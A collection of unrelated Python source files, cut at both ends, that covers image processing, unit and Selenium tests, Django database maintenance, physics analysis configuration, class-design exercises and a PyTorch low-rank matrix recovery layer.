    newImage = Image.new("RGB", (newwid, newhg))
    counterx = 0
    for x in range(0, newwid, block_size):
        countery = 0
        for y in range(0, newhg, block_size):
            # Alternate block sources in a checker pattern.
            if (counterx + countery) % 2 == 0:
                imgBlock = GetBlock(scale_newimg1, (x, y), (block_size, block_size))
            else:
                imgBlock = GetBlock(scale_newimg2, (x, y), (block_size, block_size))
            PutBlock(imgBlock, newImage, (x, y))
            countery += 1
        counterx += 1
    return newImage
# Demo: interleave two images as a 100-pixel checkerboard and display it.
# Requires light.jpg / yellow.jpg in the working directory.
img1 = Image.open("light.jpg")
img2 = Image.open("yellow.jpg")
img3 = CheckerBoard(img1, img2, 100)
img3.show()
|
from __future__ import absolute_import
import unittest
from rutermextract.ranker import Ranker
from rutermextract.term_extractor import Term
class RankerTest(unittest.TestCase):
    """Unit tests for rutermextract.Ranker's ordering of extracted terms."""
    def setUp(self):
        self.ranker = Ranker()
    def test_rank(self):
        # Terms are constructed as Term(words, normalized, count); the default
        # ranking is expected to return them by descending count (3, 2, 1).
        terms = [Term(['1'], '1', 1), Term(['2', '2'], '2', 2), Term(['3', '3', '3'], '3', 3)]
        self.assertListEqual(list(self.ranker(terms)), [terms[2], terms[1], terms[0]])
    def test_rank_with_weight(self):
        # A custom weight (idf * count here) is expected to override raw
        # counts: weights 1.0, 0.6, 0.75 give the order terms[0], [2], [1].
        terms = [Term(['1'], '1', 1), Term(['2', '2'], '2', 2), Term(['3', '3', '3'], '3', 3)]
        idf = {'1': 1, '2': 0.3, '3': 0.25}
        weight = lambda term: idf.get(term.normalized, 1.0) * term.count
        self.assertListEqual(list(self.ranker(terms, weight=weight)), [terms[0], terms[2], terms[1]])

if __name__ == '__main__':
    unittest.main()
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import shutil
from pathlib import Path
import matplotlib.pyplot as plt
import pytest
import torch
import torch.nn as nn
from _pytest.fixtures import SubRequest
from pytest import MonkeyPatch
from torchgeo.datasets import DeepGlobeLandCover
class TestDeepGlobeLandCover:
    """Tests for torchgeo's DeepGlobeLandCover dataset, run against the small
    fixture archive under tests/data/deepglobelandcover."""
    @pytest.fixture(params=["train", "test"])
    def dataset(
        self, monkeypatch: MonkeyPatch, request: SubRequest
    ) -> DeepGlobeLandCover:
        # Point the class-level checksum at the fixture zip so checksum=True
        # verification passes; parametrized over both splits.
        md5 = "2cbd68d36b1485f09f32d874dde7c5c5"
        monkeypatch.setattr(DeepGlobeLandCover, "md5", md5)
        root = os.path.join("tests", "data", "deepglobelandcover")
        split = request.param
        transforms = nn.Identity()
        return DeepGlobeLandCover(root, split, transforms, checksum=True)
    def test_getitem(self, dataset: DeepGlobeLandCover) -> None:
        # Each sample is a dict carrying tensor "image" and "mask" entries.
        x = dataset[0]
        assert isinstance(x, dict)
        assert isinstance(x["image"], torch.Tensor)
        assert isinstance(x["mask"], torch.Tensor)
    def test_len(self, dataset: DeepGlobeLandCover) -> None:
        # The fixture provides 3 samples per split.
        assert len(dataset) == 3
    def test_extract(self, tmp_path: Path) -> None:
        # Copying only the archive into an empty root must trigger extraction.
        root = os.path.join("tests", "data", "deepglobelandcover")
        filename = "data.zip"
        shutil.copyfile(
            os.path.join(root, filename), os.path.join(str(tmp_path), filename)
        )
        DeepGlobeLandCover(root=str(tmp_path))
    def test_corrupted(self, tmp_path: Path) -> None:
        # A bogus archive must fail checksum verification.
        with open(os.path.join(tmp_path, "data.zip"), "w") as f:
            f.write("bad")
        with pytest.raises(RuntimeError, match="Dataset found, but corrupted."):
            DeepGlobeLandCover(root=str(tmp_path), checksum=True)
    def test_invalid_split(self) -> None:
        with pytest.raises(AssertionError):
            DeepGlobeLandCover(split="foo")
    def test_not_downloaded(self, tmp_path: Path) -> None:
        # An empty root with no archive must raise the download hint.
        with pytest.raises(
            RuntimeError,
            match="Dataset not found in `root`, either"
            + " specify a different `root` directory or manually download"
            + " the dataset to this directory.",
        ):
            DeepGlobeLandCover(str(tmp_path))
    def test_plot(self, dataset: DeepGlobeLandCover) -> None:
        # plot() must handle titles on/off and an added prediction mask.
        x = dataset[0].copy()
        dataset.plot(x, suptitle="Test")
        plt.close()
        dataset.plot(x, show_titles=False)
        plt.close()
        x["prediction"] = x["mask"].clone()
        dataset.plot(x)
        plt.close()
|
# file libraryuse/libraryuse/management/commands/dbops.py
#
# Copyright 2013 Emory University General Library
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import generators
from libraryuse import settings
import logging
from optparse import make_option
import sys
import os
from datetime import timedelta
import cx_Oracle
from django.db import connection, connections, transaction
from django.core.management.base import BaseCommand, CommandError
from libraryuse.models import LibraryVisit
from django.db.models import Max
class Command(BaseCommand):
    """Database maintenance jobs for library-use reporting.

    NOTE: legacy Python 2 / old-Django code (``except Exception, e`` syntax,
    ``option_list`` options, ``@transaction.commit_manually``); this pass only
    adds documentation.
    """
    help = "perform database maintenance operations"
    option_list = BaseCommand.option_list + (
        make_option('--refresh-esd',
            action='store_true',
            dest='refresh_esd',
            default=False,
            help='Refresh Emory Shared Data copy'),
        make_option('--refresh-libraryvisit',
            action='store_true',
            dest='refresh_libraryvisit',
            default=False,
            help='Refresh libraryvisit_mv materialized view'),
        make_option('--update-libraryvisit',
            action='store_true',
            dest='update_libraryvisit',
            default=False,
            help='Update libraryvisit_mv materialized view'),
        )

    @transaction.commit_manually
    def handle(self, *args, **options):
        """Dispatch to the selected job(s); exits if no flag was given."""
        if not (options['refresh_esd'] or options['refresh_libraryvisit'] or options['update_libraryvisit']):
            sys.exit('Nothing to do')
        if options['refresh_esd']:
            self.refresh_esd()
        if options['refresh_libraryvisit']:
            self.refresh_libraryvisit()
        if options['update_libraryvisit']:
            self.update_libraryvisit()

    @transaction.commit_manually
    def refresh_esd(self):
        """Truncate the local esd table and reload it from the Oracle ESD
        view, md5-hashing the person identifiers on the way in."""
        cxn_esd = connections['esd']
        cursor_esd = cxn_esd.cursor()
        #cursor_esd.execute("select * from V_LUD_PRSN where rownum <= 10")
        cursor_esd.execute("select * from V_LUD_PRSN")
        cxn_db = connections['default']
        cursor_db = cxn_db.cursor()
        try:
            cursor_db.execute("truncate esd")
            # Stream rows in batches (see ResultsIterator) to bound memory use.
            for result in self.ResultsIterator(cursor_esd):
                cursor_db.execute('''insert into esd (PRSN_I_PBLC, PRSN_I_ECN,
                    PRSN_E_TITL_DTRY, PRSN_C_TYPE,
                    PRSN_E_TYPE, EMJO_C_CLSF, DPRT_C, DPRT_N, DVSN_I, DVSN_N,
                    EMPE_C_FCLT_RANK, PRSN_C_TYPE_HC, PRSN_E_TYPE_HC, EMJO8HC_C_CLSF,
                    DPRT8HC_C, DPRT8HC_N, DVSN8HC_I, DVSN8HC_N, ACCA_I, ACPR_N,
                    ACPL_N, STDN_E_CLAS, STDN_F_UNGR, STDN_F_CMPS_ON) values (
                    md5(%s), md5(%s), %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s,
                    %s, %s, %s, %s, %s, %s, %s, %s)''', result)
        except Exception, e:
            # Roll back the half-loaded table before surfacing the error.
            transaction.rollback()
            cxn_esd.close()
            cxn_db.close()
            raise CommandError("problem refreshing db.esd: %s" % e)
        transaction.commit()
        cxn_esd.close()
        cxn_db.close()

    @transaction.commit_manually
    def refresh_libraryvisit(self):
        """Drop and rebuild the libraryvisit_mv 'materialized view' table by
        joining turnstile swipes to the ESD person copy."""
        cxn_db = connections['default']
        cursor_db = cxn_db.cursor()
        try:
            try:
                cursor_db.execute("drop table libraryvisit_mv")
            except:
                sys.exc_clear() #no problem
            cmd = ('''create table libraryvisit_mv
                as select distinct concat(idnumber,substr(term_date,1,16)) as id,
                idnumber, lastname, firstname,
                str_to_date(concat(substr(term_date,1,16),':00'), '%Y-%m-%d %T') as visit_time,
                location, term_number, PRSN_I_PBLC, PRSN_I_ECN, PRSN_I_HR, PRSN8HC_I_HR,
                PRSN_I_SA, PRSN_E_TITL_DTRY, PRSN_C_TYPE, PRSN_E_TYPE,
                EMJO_C_CLSF, DPRT_C, DPRT_N, DVSN_I, DVSN_N, EMPE_C_FCLT_RANK,
                PRSN_C_TYPE_HC, PRSN_E_TYPE_HC, EMJO8HC_C_CLSF, DPRT8HC_C,
                DPRT8HC_N, DVSN8HC_I, DVSN8HC_N, ACCA_I, ACPR_N, ACPL_N,
                STDN_E_CLAS, STDN_F_UNGR, STDN_F_CMPS_ON
                from turnstile, esd
                where replace(turnstile.idnumber,' ', '') = esd.PRSN_I_ECN;''')
            cursor_db.execute(cmd)
        except Exception, e:
            transaction.rollback()
            cxn_db.close()
            raise CommandError("problem refreshing db.libraryvisit_mv: %s" % e)
        transaction.commit()
        cxn_db.close()

    @transaction.commit_manually
    def update_libraryvisit(self):
        '''This updates the libraryvisit_mv table and then optimizes it.'''
        cxn_db = connections['default']
        cursor_db = cxn_db.cursor()
        # NOTE(review): search_date is computed (latest visit + 1 minute) but
        # never used in the SQL below — INSERT IGNORE dedupes instead.
        last_date = LibraryVisit.objects.all().aggregate(Max('visit_time'))
        search_date = last_date['visit_time__max'] + timedelta(minutes=1)
        try:
            cmd = '''INSERT IGNORE INTO libraryvisit_mv (id,
                visit_time, location, prsn_i_pblc, prsn_i_ecn,
                prsn_i_hr, prsn8hc_i_hr, prsn_i_sa, prsn_e_titl_dtry, prsn_c_type,
                prsn_e_type, emjo_c_clsf, dprt_c, dprt_n, dvsn_i, dvsn_n,
                empe_c_fclt_rank, prsn_c_type_hc, prsn_e_type_hc, emjo8hc_c_clsf,
                dprt8hc_c, dprt8hc_n, dvsn8hc_i, dvsn8hc_n, acca_i, acpr_n,
                acpl_n, stdn_e_clas, stdn_f_ungr, stdn_f_cmps_on)
                (SELECT md5(concat(turnstile.idnumber,concat(substr(turnstile.visit_time,1,16),':00'))),
                str_to_date(concat(substr(turnstile.visit_time,1,16),':00'), '%Y-%m-%d %T'),
                turnstile.library, esd.prsn_i_pblc, turnstile.idnumber, esd.prsn_i_hr, esd.prsn8hc_i_hr,
                esd.prsn_i_sa, esd.prsn_e_titl_dtry, esd.prsn_c_type, esd.prsn_e_type,
                esd.emjo_c_clsf, esd.dprt_c, esd.dprt_n, esd.dvsn_i, esd.dvsn_n,
                esd.empe_c_fclt_rank, esd.prsn_c_type_hc, esd.prsn_e_type_hc, esd.emjo8hc_c_clsf,
                esd.dprt8hc_c, esd.dprt8hc_n, esd.dvsn8hc_i, esd.dvsn8hc_n, esd.acca_i, esd.acpr_n,
                esd.acpl_n, esd.stdn_e_clas, esd.stdn_f_ungr, esd.stdn_f_cmps_on
                FROM turnstile, esd
                WHERE (turnstile.idnumber = esd.prsn_i_ecn));
                ALTER TABLE libraryvisit_mv ENGINE='InnoDB';'''
            cursor_db.execute(cmd)
        except Exception, e:
            transaction.rollback()
            cxn_db.close()
            raise CommandError("problem updating db.libraryvisit_mv: %s" % e)
        transaction.commit()
        cxn_db.close()

    def ResultsIterator(self, cursor, howmany=1000):
        """Yield rows from `cursor` one at a time, fetching `howmany` per
        round trip so the whole result set is never held in memory."""
        while True:
            results = cursor.fetchmany(howmany)
            if not results:
                break
            for result in results:
                yield result
import sys
# Python 2: print the second-to-last whitespace-separated token of each line
# of the file named on the command line.
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
    # NOTE(review): `if test:` is always true for lines read from a file
    # (even a bare "\n"); skipping blank lines would need `if test.strip():`.
    if test:
        line = test.strip().split()
        print line[-2]
test_cases.close()
|
x = 5  # NOTE(review): module-level value, unused in the visible code — confirm before removing
from tkinter import messagebox
class parameterException(Exception):
    """Raised when a parameter falls outside its allowed range."""
    def __init__(self, msg):
        # Forward to Exception so str(exc) carries the message.
        Exception.__init__(self, msg)

def check(num):
    """Raise parameterException if `num` exceeds the allowed maximum of 7.

    Errors must be raised from inside a try block to be caught by callers.
    """
    if num > 7:
        # Bug fix: the original message contained a racial slur; replaced
        # with a professional description of the failure.
        raise parameterException('value error: parameter must be <= 7')
def doSomething():
    """Demonstrate catching parameterException and surfacing it in a GUI
    error dialog instead of crashing."""
    try:
        check(8)  # 8 > 7, so this raises before the next line runs
        print('no error detected')
    except parameterException as pe: #catch error of type parameterException
        #print(pe) #print the string representation of the parameterException object
        messagebox.showerror("Error", pe)

if __name__ == "__main__":
    doSomething()
|
#!/bin/env python
'''
Banana Cluster Control Agent Daemon
'''
import sys, os
if __name__ == '__main__':
    # Put the project root (parent of this script's directory) on sys.path
    # so the `lib.bccagentd` package resolves when the daemon is launched
    # directly rather than as an installed module.
    str_abs_basedir = os.path.dirname(os.path.realpath(__file__))
    str_abs_rootdir = os.path.dirname(str_abs_basedir)
    sys.path.insert(0, str_abs_rootdir)
    from lib.bccagentd import bccagentd
    bccagentd.main()
#
# FFTJet pileup analyzer configuration. Default is the PFJet
# "MC calibration" mode. Here, we collect FFTJetPileupEstimator
# summaries and do not collect FFTJetPileupProcessor histograms.
#
# I. Volobouev, April 27, 2011
#
import math
import FWCore.ParameterSet.Config as cms
# EDAnalyzer configuration; the collect* booleans below select which input
# products are consumed, so the defaults (summaries + MC pileup info, no
# processor histograms) match the "MC calibration" mode described above.
fftjetPileupAnalyzer = cms.EDAnalyzer(
    "FFTJetPileupAnalyzer",
    #
    # Label for the histograms produced by FFTJetPileupProcessor
    histoLabel = cms.InputTag("pileupprocessor", "FFTJetPileupPFStudy"),
    #
    # Label for the summary produced by FFTJetPileupEstimator
    summaryLabel = cms.InputTag("pileupestimator", "FFTJetPileupEstimatePFUncalib"),
    #
    # Label for the MC pileup summary
    pileupLabel = cms.string("addPileupInfo"),
    #
    # Labels for fastjet rho and sigma (empty = not collected by default)
    fastJetRhoLabel = cms.InputTag(""),
    fastJetSigmaLabel = cms.InputTag(""),
    #
    # Label for the energy discretization grid
    gridLabel = cms.InputTag("fftjetpatreco", "FFTJetPatternRecognition"),
    #
    # Label for the collection of primary vertices
    srcPVs = cms.InputTag("offlinePrimaryVertices"),
    #
    # Cut on the nDoF of the primary vertices
    vertexNdofCut = cms.double(4.0),
    #
    # Output ntuple name/title
    ntupleName = cms.string("FFTJetPileupAnalyzer"),
    ntupleTitle = cms.string("FFTJetPileupAnalyzer ntuple"),
    #
    # Settings for the types of info we are collecting
    collectHistos = cms.bool(False),
    collectPileup = cms.bool(True),
    collectOOTPileup = cms.bool(False),
    collectNumInteractions = cms.bool(True),
    collectFastJetRho = cms.bool(False),
    collectSummaries = cms.bool(True),
    collectGrids = cms.bool(False),
    collectGridDensity = cms.bool(False),
    collectVertexInfo = cms.bool(False),
    verbosePileupInfo = cms.bool(False),
    #
    # There is a bug somewhere in the module which builds
    # PileupSummaryInfo (it shows up in some events with OOP pileup).
    # The following kind-of helps avoiding crazy energy values.
    crazyEnergyCut = cms.double(2500.0)
)
|
# A User class with both a class attribute (shared counter) and per-instance state.
class User:
    # Count of users created and not yet logged out, shared by all instances.
    active_users = 0

    def __init__(self, first, last, age):
        self.first = first
        self.last = last
        self.age = age
        User.active_users += 1

    def logout(self):
        """Decrement the shared active-user counter and report the logout."""
        User.active_users -= 1
        return f"{self.first} has logged out"

    def full_name(self):
        return f"{self.first} {self.last}"

    def initials(self):
        return f"{self.first[0]}.{self.last[0]}."

    def likes(self, thing):
        return f"{self.first} likes {thing}"

    def is_senior(self):
        return self.age >= 65

    def birthday(self):
        """Increment the user's age and return a birthday greeting."""
        self.age += 1
        return f"Happy {self.age}th, {self.first}"

    @classmethod
    def display_active_user(cls):
        # Bug fix: the message previously said "active mods" — a copy/paste
        # from Moderator.display_active_mods — but this counter tracks users.
        return f"There are currently {cls.active_users} active users"
class Moderator(User):
    # Count of moderators ever created (never decremented on logout).
    total_mods = 0

    def __init__(self, first, last, age, community):
        super().__init__(first, last, age)
        self.community = community
        Moderator.total_mods += 1

    @classmethod
    def display_active_mods(cls):
        return f"There are currently {cls.total_mods} active mods"

    def remove_post(self):
        # Bug fix: this was decorated @classmethod while taking `self` and
        # reading per-instance state (full_name(), self.community), so any
        # call raised TypeError; it is an instance method.
        return f"{self.full_name()} removed a post from the {self.community} community"
# print(user1.likes("Ice Cream"))
# print(user2.likes("Chips"))
# print(user2.initials())
# print(user1.initials())
# print(user2.is_senior())
# print(user1.age)
# print(user1.birthday())
# print(user1.age)
# user1.say_hi()
# Demo: create users and moderators, then show the shared counters.
# NOTE(review): user2 and mod1 are each assigned twice, so the first Blanca
# and x-men objects become unreachable while still being counted in
# active_users / total_mods — likely unintentional.
user1 = User("Joe", "Smith", 68)
user2 = User("Blanca", "Lopez", 41)
user2 = User("Yorp", "Urkl", 391)
mod1 = Moderator("x", "men", 0, 'comics')
mod1 = Moderator("mario", "bros", 0, 'video games')
print(User.display_active_user())
print(Moderator.display_active_mods())
# print(User.active_users)
# print(User.active_users)
# print(user2.logout())
# print(User.active_users)
|
# Princeton University licenses this file to You under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy of the License at:
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and limitations under the License.
# ********************************************* AdaptiveMechanism *****************************************************
"""
Overview
--------
An AdaptiveMechanism is a type of `Mechanism <Mechanisms>` that uses its input to modify the parameters of one or more
other PsyNeuLink components. In general, an AdaptiveMechanism receives its input from an `ObjectiveMechanism`, however
this need not be the case. There are two types of AdaptiveMechanism: `LearningMechanisms <LearningMechanism>`, that
modify the parameters of `MappingProjections <MappingProjection>`; and `ControlMechanisms <ControlMechanism>` that
modify the parameters of other ProcessingMechanisms. AdaptiveMechanisms are always executed after all
ProcessingMechanisms in the `process <Process>` or `system <System>` to which they belong have been
:ref:`executed <LINK>`, with all LearningMechanisms then executed before all ControlMechanisms. Both types of
AdaptiveMechanisms are executed before the next :ref:`round of execution <LINK>`, so that the modifications they make
are available during the next round of execution of the process or system.
.. _AdaptiveMechanism_Creation:
Creating an AdaptiveMechanism
------------------------------
An AdaptiveMechanism can be created by using the standard Python method of calling the constructor for the desired type.
AdaptiveMechanisms of the appropriate subtype are also created automatically when a :ref:`system
<System.System_Creation>` is created, and/or learning is specified for a :ref:`system <System.System_Learning>`,
a `process <Process_Learning>`, or any `projection <LearningProjection_Automatic_Creation>` within one. See the
documentation for the individual subtypes of AdaptiveMechanisms for more specific information about how to create them.
.. _AdaptiveMechanism_Structure:
Structure
---------
An AdaptiveMechanism has the same basic structure as a `Mechanism <Mechanisms>`. See the documentation for
individual subtypes of AdaptiveMechanism for more specific information about their structure.
.. _Comparator_Execution:
Execution
---------
An AdaptiveMechanism always executes after execution of all of the ProcessingMechanisms in the process or system to
which it belongs. All of the `LearningMechanisms <LearningMechanism>` are then executed, followed by all of the
`ControlMechanisms <ControlMechanism>`.
"""
from PsyNeuLink.Components.Mechanisms.Mechanism import *
from PsyNeuLink.Components.ShellClasses import *
class AdpativeMechanismError(Exception):
    """Error raised by AdaptiveMechanism components.

    Note: the "Adpative" typo in the class name is preserved because external
    code may already catch the exception under this name.
    """
    def __init__(self, error_value):
        # Bug fix: forward to Exception.__init__ so str(err) shows the
        # message (previously the base initializer was skipped and str(err)
        # was empty).
        super().__init__(error_value)
        self.error_value = error_value
class AdaptiveMechanism_Base(Mechanism_Base):
    # IMPLEMENT: consider moving any properties of adaptive mechanisms not used by control mechanisms to here
    """An AdaptiveMechanism is a Type of the `Mechanism <Mechanism>` Category of Component
    """
    componentType = "AdaptiveMechanism"
    classPreferenceLevel = PreferenceLevel.TYPE
    # Any preferences specified below will override those specified in TypeDefaultPreferences
    # Note: only need to specify setting; level will be assigned to TYPE automatically
    # classPreferences = {
    #     kwPreferenceSetName: 'AdaptiveMechanismClassPreferences',
    #     kp<pref>: <setting>...}
    # variableClassDefault = defaultControlAllocation
    # This must be a list, as there may be more than one (e.g., one per controlSignal)
    variableClassDefault = defaultControlAllocation
    def __init__(self,
                 variable=None,
                 params=None,
                 name=None,
                 prefs=None,
                 context=None):
        """Abstract class for AdaptiveMechanism

        All arguments are forwarded unchanged to Mechanism_Base; `system` is
        initialized to None here — presumably assigned later when the
        mechanism is added to a System (confirm against System code).
        """
        self.system = None
        super().__init__(variable=variable,
                         params=params,
                         name=name,
                         prefs=prefs,
                         context=context)
import os

# Directory and files whose combined size (in bytes) this script reports.
ftp_dir = "/home/tarena/FTP"  # renamed from `dir` to avoid shadowing the builtin
file_names = ("exercise01.py", "pool.py")

# Sum the individual file sizes.  (Previously two getsize() calls were
# written out by hand with the directory repeated in each path, and an
# unused `res = 0` accumulator was never touched.)
q3 = sum(os.path.getsize(os.path.join(ftp_dir, name)) for name in file_names)
print(q3)
# -*- coding: utf-8 -*-
'''
Created on 7 may. 2017
@author: jose
'''
import time
class objSi(object):
    '''
    One installed software instance (a row of tb_softwareinstancia).

    NOTE: legacy Python 2 code (the ``<>`` inequality operator in
    actualizaInstancia); this pass only adds documentation.
    '''
    def __init__(self, _id='',id_si=0,id_sw=0,id_serv=0,id_entorno='PRO',version='',ip='',user='',home=''):
        '''
        Constructor: stash the identifying keys and attributes; dic_si is a
        cache filled by cargaSoftware().
        '''
        self._id=_id
        self.id_si=id_si
        self.id_sw=id_sw
        self.id_serv=id_serv
        self.id_entorno=id_entorno
        self.version=version
        self.home=home
        self.ip = ip
        self.user=user
        self.dic_si={}
        return
    def cargaSoftware(self,conn):
        '''Load this instance's row from tb_softwareinstancia into a dict,
        cache it on self.dic_si, and return it.'''
        dic={}
        # id_si is an int, so the string concatenation below cannot inject
        # SQL, but a parameterized query would still be safer.
        sql = 'select id_entorno,version,home,usuario,deleted,_id from tb_softwareinstancia where id_si='+str(self.id_si)
        lsi=conn.consulta(sql)
        dic['entorno']=lsi[0][0]
        dic['version']=lsi[0][1]
        dic['home']=lsi[0][2]
        dic['usuario']=lsi[0][3]
        # A NULL deleted flag is treated as "not deleted".
        dic['deleted']=False if lsi[0][4] == None else lsi[0][4]
        self.dic_si=dic
        return dic
    def actualizaInstancia(self, id_si,conn):
        '''Update the stored row when the in-memory values differ from the
        database copy; return True if an update was issued.'''
        modificado=False
        di = conn.retInstanciaSW(id_si)
        data = (self.version.encode('ascii','ignore'),self.home,self.user,self.id_entorno)
        if data <> di :
            sql ="update tb_softwareinstancia set version=%s, home=%s,usuario=%s,id_entorno=%s, fsync='"+time.strftime("%c")+"' where id_si="+str(id_si)
            conn.actualizaTabla(sql,data)
            modificado =True
        return modificado
    def grabaBBDD(self,conn):
        '''Insert this instance as a new row and remember/return the
        generated id_si.'''
        data=(self.id_sw,self.id_serv,self.id_entorno,self.version,self.home,self.user,time.strftime("%c"))
        sql = 'insert into tb_softwareinstancia (id_sw,id_serv,id_entorno,version,home,usuario,fsync) values (%s,%s,%s,%s,%s,%s,%s)'
        self.id_si=conn.actualizaTabla(sql,data)
        return self.id_si
|
# coding: utf-8
# Demonstrates isinstance(): whether an object is an instance of a class
# (i.e. what instantiated it) or inherits from a class (its prototype chain).
# FIX: the Iterable ABC alias was removed from `collections` in Python 3.10;
# it must be imported from `collections.abc`.
from collections.abc import Iterable


class Person:
    pass


p1 = Person()
print(isinstance(p1, Person))  # True: direct type
print(isinstance(p1, object))  # True: every class inherits from object
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class ProcessPromoteStatus(Model):
    """ProcessPromoteStatus.

    NOTE: generated model (see the file header) -- change the generator,
    not this class, if the schema evolves.

    :param complete:
    :type complete: int
    :param id:
    :type id: str
    :param message:
    :type message: str
    :param pending:
    :type pending: int
    :param remaining_retries:
    :type remaining_retries: int
    :param successful:
    :type successful: bool
    """

    # Maps Python attribute names to wire (JSON) keys and msrest type tags
    # for (de)serialization.
    _attribute_map = {
        'complete': {'key': 'complete', 'type': 'int'},
        'id': {'key': 'id', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
        'pending': {'key': 'pending', 'type': 'int'},
        'remaining_retries': {'key': 'remainingRetries', 'type': 'int'},
        'successful': {'key': 'successful', 'type': 'bool'}
    }

    def __init__(self, complete=None, id=None, message=None, pending=None, remaining_retries=None, successful=None):
        super(ProcessPromoteStatus, self).__init__()
        self.complete = complete
        self.id = id
        self.message = message
        self.pending = pending
        self.remaining_retries = remaining_retries
        self.successful = successful
import unittest
from selenium import webdriver
class IndexPageTest(unittest.TestCase):
    """UI smoke tests for the /index page.

    Requires the app to be running on localhost:5000 and chromedriver on PATH.
    NOTE(review): the find_element_by_* methods were removed in Selenium 4;
    migrating to driver.find_element(By.NAME, ...) needs an extra import and
    is left for a dedicated change.
    """

    def setUp(self):
        self.driver = webdriver.Chrome()
        self.driver.get('http://localhost:5000/index')

    def test_index_title_display(self):
        self.assertIn("Kai", self.driver.title)

    def test_table_display(self):
        elem = self.driver.find_element_by_name('city_info')
        assert elem.is_displayed()

    def test_valid_health(self):
        table = self.driver.find_element_by_name('city_info')
        # Locate the 'Health' column by scanning the header cells.
        health_column = None
        for i, e in enumerate(table.find_elements_by_tag_name('th')):
            if e.text == 'Health':
                health_column = i
                break
        # BUG FIX: previously a missing 'Health' header left health_column
        # unbound and the loop below died with a NameError; fail clearly instead.
        self.assertIsNotNone(health_column, "No 'Health' column in city_info table")
        # For each data row, check the health value is in the valid range.
        for i, row in enumerate(table.find_elements_by_css_selector('tr')):
            if i == 0:
                # Skip the first row: 'tr' also matches the header row.
                continue
            col = row.find_elements_by_css_selector('td')[health_column]
            health = int(col.text)
            assert 0 < health <= 30

    def tearDown(self):
        self.driver.close()
if __name__ == '__main__':
    # Suppress ResourceWarning noise from chromedriver's unclosed sockets:
    # https://stackoverflow.com/questions/20885561/warning-from-warnings-module-resourcewarning-unclosed-socket-socket-object
    unittest.main(warnings='ignore')
|
def decorate_1(func):
    # Decorator-factory teaching demo. NOTE(review): the wrapper prints the
    # *return value* of func() (None for test_dec), and decorate_1(10) below
    # wraps a non-callable, so calling k1() would raise TypeError. The script
    # currently runs without error, so behavior is left unchanged.
    print("----开始装饰------")
    def inner():
        print("----使用方法---{}".format(func()))
    return inner

k1 = decorate_1(10)  # decorating a plain int: k1 is `inner`, but unsafe to call
print(k1)

@decorate_1
def test_dec():
    print("----测试用的")

#k2 = K1(20)
test_dec()
#print(k2)
import torch
from torch.autograd import Variable
from torch.autograd import Function
from torch.autograd import gradcheck
import math
import numpy as np
import torch.nn as nn
import os
import scipy.io as sio
def A(input, index):
    """Sampling operator: vectorize *input* (row-major over its transpose,
    i.e. column-major over the original) and keep the rows listed in *index*."""
    flattened = torch.reshape(input.t(), (-1, 1))
    return flattened[index]
def At(input, index, addmatrix):
    """Adjoint of A: scatter *input* back into a zero tensor shaped like
    *addmatrix* (transposed layout), then undo the transpose.

    NOTE: allocates on the GPU (`.cuda()`), so CUDA must be available.
    """
    target_shape = addmatrix.size()
    scattered = torch.zeros(torch.numel(addmatrix), 1).cuda()
    scattered[index] = input
    return torch.reshape(scattered, target_shape).t()
def A_Gaussian(input, GA):
    """Gaussian measurement operator: GA @ vec(input).

    NOTE: moves GA to the GPU (`.cuda()`), so CUDA must be available.
    """
    column = torch.reshape(input, (-1, 1))
    return GA.cuda().mm(column)
def At_Gaussian(input, GA):
    """Adjoint Gaussian measurement: reshape(GA^T @ input) to a 128x128 matrix.

    NOTE: the 128x128 output size is hard-coded; moves GA to the GPU.
    """
    back_projected = GA.cuda().t().mm(input)
    return torch.reshape(back_projected, (128, 128))
def simple_batch_norm_1d(x, gamma, beta):
    """Normalize *x* to zero mean / unit variance over ALL elements, then
    scale by *gamma* and shift by *beta* (each reshaped to a scalar)."""
    eps = 1e-5
    mean = torch.mean(x)
    variance = torch.mean((x - mean) ** 2)
    normalized = (x - mean) / torch.sqrt(variance + eps)
    return gamma.view_as(mean) * normalized + beta.view_as(mean)
class input_layer(nn.Module):
    """First unrolled iteration of a low-rank recovery step.

    NOTE(review): looks like a learned singular-value-thresholding update
    (gradient step + rank-r SVD truncation) -- confirm against the paper
    this network implements. forward() relies on the module-level helpers
    A_Gaussian/At_Gaussian and on CUDA being available.
    """
    def __init__(self, in_features, out_features, indexs):
        super(input_layer, self).__init__()
        self.indexs = indexs
        # Learned step size, initialised to (#matrix entries / #samples).
        self.u = nn.Parameter((in_features*out_features/len(indexs))*torch.ones(1, 1))
        self.a = nn.Parameter(0.1*torch.ones(1, 1)) #approximate divergence of alpha
        self.c = nn.Parameter(1*torch.ones(1, 1))
        # self.gamma = nn.Parameter(0.1 * torch.ones(1, 1))
        # self.beta = nn.Parameter(0.1 * torch.ones(1, 1))
        # L0: fixed zero starting iterate (a buffer, so it is not trained).
        self.register_buffer('L0', torch.zeros(in_features, out_features))

    def forward(self, inputs):
        # inputs: (measurements y, target rank r, Gaussian sensing matrix GA)
        y, r, GA = inputs
        # Gradient step on the data-fit term, mapped back to matrix space.
        G = At_Gaussian(y - A_Gaussian(self.L0, GA), GA)
        R = self.L0 + self.u * G
        # Rank-r truncation of R via SVD.
        u, s, v = torch.svd(R)
        v1=v.t()
        Z=torch.mm(torch.mm(u[:,0:r], torch.diag(s[0:r])), v1[0:r,:])
        # Learned combination of the truncated and raw iterates.
